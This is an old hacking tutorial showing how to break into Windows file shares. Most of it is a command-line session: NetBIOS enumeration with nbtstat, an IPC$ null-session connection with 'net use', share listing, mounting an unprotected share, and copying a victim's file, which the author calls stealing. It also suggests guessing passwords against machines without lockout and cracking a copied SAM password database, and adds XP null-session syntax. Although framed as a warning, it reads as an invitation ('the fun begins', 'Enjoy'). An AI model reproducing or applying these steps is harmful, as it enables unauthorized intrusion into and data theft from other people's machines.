Madirish Tutorial 09
30 November -0001
Ok, hopefully this will show you how important it is to a) choose a good logon password, and
b) to password protect any shares you are using. Lets say through a network scan I find that
the computer at 216.25.200.132 is a windows machine. I want to check and see if that machine
is sharing anything, and if I can get the shares. Note: The IP addresses and names have
been CHANGED to protect the vulnerable, lines in red are my comments, the rest is actual
output from my session:
C:\>nbtstat -A 215.25.200.152
Local Area Connection 2:
Node IpAddress: [0.0.0.0] Scope Id: []
Host not found.
Local Area Connection:
Node IpAddress: [215.25.200.135] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
NCARTER <00> UNIQUE Registered
SVNET <00> GROUP Registered
NCARTER <20> UNIQUE Registered
SVNET <1E> GROUP Registered
NCARTER <03> UNIQUE Registered
NCARTER <1F> UNIQUE Registered
MAC Address = 00-00-E8-9A-9E-12
\Device\NetBT_Tcpip_{7CD42A51-8B2F-4A5F-A42E-1C76F336D3DE}:
Node IpAddress: [215.25.200.140] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
NCARTER <00> UNIQUE Registered
SVNET <00> GROUP Registered
NCARTER <20> UNIQUE Registered
SVNET <1E> GROUP Registered
NCARTER <03> UNIQUE Registered
NCARTER <1F> UNIQUE Registered
MAC Address = 00-00-E8-9A-9E-12
Using this command I have found that the username on this computer is NCARTER, and the workgroup is SVNET. Now the fun begins:
C:\>net use \\215.25.200.152\ipc$ /user:ncarter Local name Remote name \\215.25.200.152\ipc$ Resource type IPC Status OK # Opens 0 # Connections 1 The command completed successfully.
Ok, this is a bit simulated, usually you'll have to enter a password, but I got lucky here and there was no password in effect. If there had been a password you could issue 'net use \\215.25.200.152\ipc$ /user:ncarter PASSWORD' where PASSWORD = your guess as to thier password. Many systems will lock you out after 3 bad attempts, but you'd be surprised how many won't. What you're doing is trying to establish a null share connection.
C:\>net view \\215.25.200.152 Shared resources at \\215.25.200.152 Share name Type Used as Comment ------------------------------------------------------------------------------- HP COLOR Print MUSIC Disk PUBLIC Disk TOSEND Disk The command completed successfully.Ok, now we know the names of the shares on this computer. Lets try to connect to the 'TOSEND' share:
C:\>net use u: \\215.25.200.152\tosend The password is invalid for \\215.25.200.152\tosend. Type the password for \\215.25.200.152\tosend: System error 5 has occurred. Access is denied.
No dice, its password protected, lets try the others:
C:\>net use y: \\215.25.200.152\public The command completed successfully.
Bingo, we're in. Notice the y: in the 'net use' command? Thats the local drive name that we're going to use as a link to NCARTER.
C:\>net view \\215.25.200.152
Shared resources at \\215.25.200.152
Share name Type Used as Comment
-------------------------------------------------------------------------------
HP COLOR Print
MUSIC Disk
PUBLIC Disk Y:
TOSEND Disk
The command completed successfully.
C:\>dir y:
Volume in drive Y is HP_PAVILION
Volume Serial Number is 1C68-0F0A
Directory of Y:
04/26/2000 12:56p <DIR> .
04/26/2000 12:56p <DIR> ..
04/26/2000 11:57a 331 Shortcut to Sawmill5.0.lnk
04/26/2000 12:58p 29,696 hits.doc
04/26/2000 01:33p 978,918 wtapi.pdf
04/26/2000 01:44p 19,456 USER TIMEOUT.doc
05/04/2000 02:34p 23,552 Letterhead.dot
11/15/2000 06:37p 20,480 Contact list.doc
07/24/2000 01:19p 87,040 Elegant Fax.doc
09/18/2000 12:38p 7,710,412 KingofPrussia000918.pdf
06/26/2000 04:28p <DIR> HP Drivers
09/18/2000 05:04p 15,906 cover.jpg
06/22/2000 12:33p <DIR> halflife update
06/02/2000 02:05p <DIR> School
09/06/2000 02:40p <DIR> abae
01/29/2000 05:33p <DIR> Content
04/27/2000 02:21p <DIR> photos
05/23/2000 01:22p <DIR> delete_button
03/01/2001 02:12p <DIR> Firewall Docs
06/20/2000 03:28p <DIR> Install
06/27/2000 10:26a <DIR> HomePage
07/12/2000 02:12p 463 Team Fortress Classic Manual.lnk
09/18/2000 10:54a 16,864,741 wtetrial.exe
10/26/2000 04:39p <DIR> Visor programs
11/29/2000 03:39p 26,112 TCS VS letter.doc
12 File(s) 25,777,107 bytes
13 Dir(s) 5,406,457,856 bytes free
C:\>copy y:\hits.doc
1 file(s) copied.
C:\>dir hits*
Volume in drive C has no label.
Volume Serial Number is 94B4-57C0
Directory of C:
04/26/2000 12:58p 29,696 hits.doc
1 File(s) 29,696 bytes
0 Dir(s) 2,796,068,864 bytes free
The rest of what I did should be pretty obvious. I stole a copy of hits.doc and moved it to my local C: drive. Notice how easy all of this was?!? If you're really lucky you'll get an NT machine and be able to copy the SAM database file and crack it to get a list of all the users AND their passwords. Enjoy
-------------------------------------------------------------------------------------------
The tutorial, unfortunately, describes the method to connect to Windows 98, Windows ME and Samba shares only. NT, 2000, and XP authenticate with a domain as well, so if you want to connect to an XP share you have to specify the domain in your username, for instance:
net use \\target.hostname.ext\ipc$ /USER:username@fulldomain.ext password
will allow you to connect to a null session on an XP machine. Its sort of a pain in the butt. To find your domain name you can either type
ipconfig /ALL
at the command line, or you can right click on your 'My Computer', select 'Properties' then click the 'Network Identification' tab.